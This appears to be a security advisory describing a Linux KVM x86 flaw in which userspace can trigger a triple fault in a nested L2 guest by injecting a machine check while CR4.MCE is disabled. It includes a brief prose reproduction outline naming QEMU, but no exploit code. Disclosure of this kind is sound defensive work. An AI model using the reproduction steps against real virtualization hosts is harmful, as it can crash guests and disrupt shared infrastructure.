Linux Kernel KVM Triple Fault Handling Vulnerability in Nested Virtualization

A vulnerability in the Linux kernel's KVM (Kernel-based Virtual Machine) component for x86 architecture has been identified. This issue arises from an incorrect assumption that userspace cannot induce a triple fault in a nested virtual machine (L2) without going through KVM_RUN, which would normally allow KVM to manage such events properly. The vulnerability can be triggered if userspace sends a machine check while L2 is active and CR4.MCE is disabled. Additionally, a forthcoming change to preserve KVM_REQ_TRIPLE_FAULT during migration could make it easier for userspace to exploit this issue.

Impact

Exploitation of this vulnerability can lead to a triple fault in a nested virtual machine, causing it to crash and potentially disrupt the host system's virtualization environment.

Reproduction

The vulnerability can be reproduced by injecting a machine check into a nested virtual machine (L2) while CR4.MCE is set to 0. This can be done using a tool that manipulates machine check exceptions, such as QEMU, while the virtual machine is running.